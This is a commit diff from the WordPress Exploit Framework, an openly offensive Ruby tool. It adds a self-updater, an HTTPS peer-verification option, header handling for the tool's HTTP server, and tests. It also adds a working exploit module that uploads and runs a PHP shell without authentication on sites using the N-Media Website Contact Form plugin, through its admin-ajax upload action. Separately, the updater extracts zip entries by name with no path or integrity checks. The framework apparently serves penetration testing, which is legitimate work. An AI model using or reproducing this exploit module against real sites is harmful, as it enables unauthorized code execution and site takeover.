Merged development into master

Author: rastating

VERSION

@@ -0,0 +1 @@
+1.1.0

env.rb

@@ -20,6 +20,8 @@
 require 'wpxf/utility/text'
 require 'wpxf/utility/reference_inflater'
 
+require 'github_updater'
+
 module Wpxf
   def self.data_directory=(val)
     @@data_directory = val
@@ -29,6 +31,14 @@ def self.data_directory
     @@data_directory
   end
 
+  def self.app_path=(val)
+    @@app_path = val
+  end
+
+  def self.app_path
+    @@app_path
+  end
+
   def self.change_stdout_sync(enabled)
     original_setting = STDOUT.sync
     STDOUT.sync = true
@@ -37,4 +47,5 @@ def self.change_stdout_sync(enabled)
   end
 end
 
+Wpxf.app_path = app_path
 Wpxf.data_directory = File.join(app_path, 'data/')

github_updater.rb

@@ -0,0 +1,81 @@
+require 'json'
+require 'typhoeus'
+require 'fileutils'
+
+module Wpxf
+  # A self updater that uses the latest release from GitHub as the target.
+  class GitHubUpdater
+    def latest_release_url
+      'https://api.github.com/repos/rastating/wordpress-exploit-framework/releases/latest'
+    end
+
+    # Get information about the latest update available on GitHub.
+    # @param current_version [String] the current version number in use.
+    # @return [Hash, nil] a hash containing the :release_notes, :zip_url and :release_name, or nil if there is no update.
+    def get_update(current_version)
+      res = Typhoeus.get(latest_release_url)
+      return nil unless res && res.code == 200
+
+      begin
+        update = JSON.parse(res.body)
+      rescue JSON::ParserError
+        return nil
+      end
+
+      begin
+        return nil if Gem::Version.new(current_version) >= Gem::Version.new(update['tag_name'].sub(/^v/, ''))
+      rescue
+        return nil
+      end
+
+      { release_notes: update['body'], zip_url: update['zipball_url'], release_name: update['name'] }
+    end
+
+    # Download and apply an update from the specified URL.
+    # @param zip_url [String] the URL to fetch the update from.
+    def download_and_apply_update(zip_url)
+      tmp = create_tmp_directory
+      zip_filename = File.join(tmp, 'update.zip')
+
+      download_update_zip(zip_url, zip_filename)
+
+      Zip::File.open(zip_filename) do |zip_file|
+        zip_file.each do |entry|
+          entry.extract File.join(tmp, entry.name)
+        end
+      end
+
+      Dir.glob(File.join(tmp, 'rastating-wordpress-exploit-framework*/*')) do |f|
+        FileUtils.cp_r(f, Wpxf.app_path)
+      end
+
+      FileUtils.rm_rf(tmp)
+    end
+
+    private
+
+    def create_tmp_directory
+      tmp = File.join(Dir.tmpdir, "wpxf_update_#{object_id}")
+      FileUtils.mkdir_p(tmp)
+      tmp
+    end
+
+    def download_update_zip(zip_url, local_filename)
+      zip = File.open(local_filename, 'wb')
+      request = Typhoeus::Request.new(zip_url, followlocation: true)
+      request.on_headers do |response|
+        raise 'Request failed' if response.code != 200
+      end
+
+      request.on_body do |chunk|
+        zip.write(chunk)
+      end
+
+      request.on_complete do
+        zip.close
+      end
+
+      request.run
+    end
+  end
+end

lib/wpxf/net/http_client.rb

@@ -35,7 +35,8 @@ def initialize_advanced_options
           HTTP_OPTION_MAX_CONCURRENCY,
           HTTP_OPTION_CLIENT_TIMEOUT,
           HTTP_OPTION_USER_AGENT,
-          HTTP_OPTION_FOLLOW_REDIRECT
+          HTTP_OPTION_FOLLOW_REDIRECT,
+          HTTP_OPTION_PEER_VERIFICATION
         ])
 
         set_option_value('user_agent', random_user_agent)

lib/wpxf/net/http_options.rb

@@ -58,6 +58,13 @@ module HttpOptions
         default: true
       )
 
+      HTTP_OPTION_PEER_VERIFICATION = BooleanOption.new(
+        name: 'verify_peer',
+        desc: 'Enable peer verification when using HTTPS',
+        required: true,
+        default: true
+      )
+
       HTTP_OPTION_MAX_CONCURRENCY = IntegerOption.new(
         name: 'max_http_concurrency',
         desc: 'Max number of HTTP requests that can be made in '\

lib/wpxf/net/http_server.rb

@@ -92,21 +92,33 @@ def http_server_thread
 
   private
 
+  def send_headers(socket, body, content_type, custom_headers)
+    headers = []
+    headers.push 'HTTP/1.1 200 OK'
+    headers.push "Content-Type: #{content_type}"
+    headers.push "Content-Length: #{body.bytesize}"
+    headers += custom_headers unless custom_headers.nil?
+    headers.push 'Connection: close'
+
+    headers.each do |header|
+      socket.print "#{header}\r\n"
+    end
+  end
+
   def send_response(response, socket)
     content_type = 'text/plain'
     body = ''
+    custom_headers = nil
 
     if response.is_a? String
       body = response
     else
       body = response[:body]
       content_type = response[:type]
+      custom_headers = response[:headers]
     end
 
-    socket.print "HTTP/1.1 200 OK\r\n"\
-                 "Content-Type: #{content_type}\r\n"\
-                 "Content-Length: #{body.bytesize}\r\n"\
-                 "Connection: close\r\n"
+    send_headers(socket, body, content_type, custom_headers)
     socket.print "\r\n"
     socket.print body
   end

lib/wpxf/net/typhoeus_helper.rb

@@ -8,6 +8,7 @@ def advanced_typhoeus_options
           proxy: datastore['proxy'],
           proxyuserpwd: datastore['proxy_auth_creds'],
           ssl_verifyhost: normalized_option_value('verify_host') ? 2 : 0,
+          ssl_verifypeer: normalized_option_value('verify_peer'),
           timeout: normalized_option_value('http_client_timeout')
         }
       end

modules/exploits/n_media_website_contact_form_shell_upload.rb

@@ -5,7 +5,7 @@ def initialize
     super
 
     update_info(
-      name: 'N-Media Website Contact Form Shell Upload',
+      name: 'N-Media Website Contact Form <= 1.3.4 Shell Upload',
       desc: 'This module exploits a file upload vulnerability in versions '\
             '<= 1.3.4 of the N-Media Website Contact Form plugin which '\
             'allows unauthenticated users to upload and execute PHP scripts '\

modules/exploits/n_media_website_contact_form_v19_shell_upload.rb

@@ -0,0 +1,43 @@
+class Wpxf::Exploit::NMediaWebsiteContactFormV19ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'N-Media Website Contact Form >= 1.9 Shell Upload',
+      author: [
+        'White Fir Design',               # Vulnerability discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/'],
+        ['WPVDB', '8623']
+      ],
+      date: 'Sep 19 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', nil, '1.9')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('file', payload.encoded, payload_name)
+    builder.add_field('name', payload_name)
+    builder.add_field('action', 'nm_webcontact_upload_file')
+    builder
+  end
+
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+
+  def uploaded_payload_location
+    stored_name = JSON.parse(upload_result.body)['file_name']
+    return normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', stored_name)
+  rescue StandardError => e
+    raise "Failed to parse response: #{e}"
+  end
+end

spec/github_updater_spec.rb

@@ -0,0 +1,87 @@
+require_relative 'spec_helper'
+
+describe Wpxf::GitHubUpdater do
+  let(:typhoeus_return_code) { :ok }
+  let(:typhoeus_code) { 200 }
+  let(:typhoeus_body) { '' }
+  let(:typhoeus_headers) { { 'Content-Type' => 'text/html; charset=utf-8' } }
+  let(:subject) { Wpxf::GitHubUpdater.new }
+
+  before :each do
+    Typhoeus.stub(/.*/) do
+      Typhoeus::Response.new(
+        code: typhoeus_code,
+        body: typhoeus_body,
+        headers: typhoeus_headers,
+        return_code: typhoeus_return_code
+      )
+    end
+  end
+
+  describe '#get_update' do
+    context 'when the API returns a status other than 200' do
+      let(:typhoeus_code) { 404 }
+
+      it 'returns nil' do
+        expect(subject.get_update('')).to be_nil
+      end
+    end
+
+    context 'when invalid JSON is returned from the API' do
+      let(:typhoeus_body) { 'invalid body' }
+
+      it 'returns nil' do
+        expect(subject.get_update('')).to be_nil
+      end
+    end
+
+    context 'when the version number from GitHub is invalid' do
+      let(:typhoeus_body) do
+        { tag_name: 'invalid version' }.to_json
+      end
+
+      it 'returns nil' do
+        expect(subject.get_update('1.0')).to be_nil
+      end
+    end
+
+    context 'when the current version number is invalid' do
+      let(:typhoeus_body) do
+        { tag_name: '1.1' }.to_json
+      end
+
+      it 'returns nil' do
+        expect(subject.get_update('invalid')).to be_nil
+      end
+    end
+
+    context 'when the current version is the same as the latest GitHub release' do
+      let(:typhoeus_body) do
+        { tag_name: '1.1' }.to_json
+      end
+
+      it 'returns nil' do
+        expect(subject.get_update('1.1')).to be_nil
+      end
+    end
+
+    context 'when the current version is older than the latest GitHub release' do
+      let(:typhoeus_body) do
+        {
+          tag_name: 'v1.1',
+          body: 'notes',
+          zipball_url: 'url',
+          name: 'v1.1'
+        }.to_json
+      end
+
+      it 'returns a hash containing the information about the latest update' do
+        expect(subject.get_update('1.0')).to include(
+          release_notes: 'notes',
+          zip_url: 'url',
+          release_name: 'v1.1'
+        )
+      end
+    end
+  end
+end

spec/net/http_client_spec.rb

@@ -46,7 +46,8 @@
         HTTP_OPTION_MAX_CONCURRENCY,
         HTTP_OPTION_CLIENT_TIMEOUT,
         HTTP_OPTION_USER_AGENT,
-        HTTP_OPTION_FOLLOW_REDIRECT
+        HTTP_OPTION_FOLLOW_REDIRECT,
+        HTTP_OPTION_PEER_VERIFICATION
       ]
 
       options.each do |o|

spec/net/typhoeus_helper_spec.rb

@@ -16,13 +16,15 @@
       subject.set_option_value('proxy_auth_creds', 'root:toor')
       subject.set_option_value('verify_host', true)
       subject.set_option_value('http_client_timeout', 10_000)
+      subject.set_option_value('verify_peer', false)
 
       expect(subject.advanced_typhoeus_options).to include(
         userpwd: 'root:toor',
         proxy: '127.0.0.1',
         proxyuserpwd: 'root:toor',
         ssl_verifyhost: 2,
-        timeout: 10_000
+        timeout: 10_000,
+        ssl_verifypeer: false
       )
     end
   end

wpxf.rb

@@ -3,6 +3,38 @@
 require 'fileutils'
 require_relative 'env'
 require 'cli/console'
+require 'slop'
+
+Slop.parse do |o|
+  o.on '--update', 'check for updates' do
+    current_version = File.read('VERSION').strip
+
+    updater = Wpxf::GitHubUpdater.new
+    update = updater.get_update(current_version)
+
+    if update.nil?
+      puts 'No updates available'
+      exit
+    end
+
+    puts 'A new update is available!'
+    puts
+    puts '-- Release Notes --'
+    puts update[:release_notes]
+    puts
+    puts "Downloading latest update (#{update[:release_name]})..."
+    updater.download_and_apply_update(update[:zip_url])
+
+    puts 'Update finished! Make sure to run "bundle install" in the WPXF directory.'
+    puts
+    exit
+  end
+
+  o.on '--version', 'print the version' do
+    puts File.read('VERSION').strip
+    exit
+  end
+end
 
 puts '                           _'
 puts '    __      _____  _ __ __| |_ __  _ __ ___  ___ ___'
@@ -31,7 +63,7 @@
 
 Dir.chdir(Dir.tmpdir) do
   temp_directories = Dir.glob('wpxf_*')
-  if temp_directories.length > 0
+  unless temp_directories.empty?
     print '[!] '.yellow
     puts "#{temp_directories.length} temporary files were found that "\
          'appear to no longer be needed.'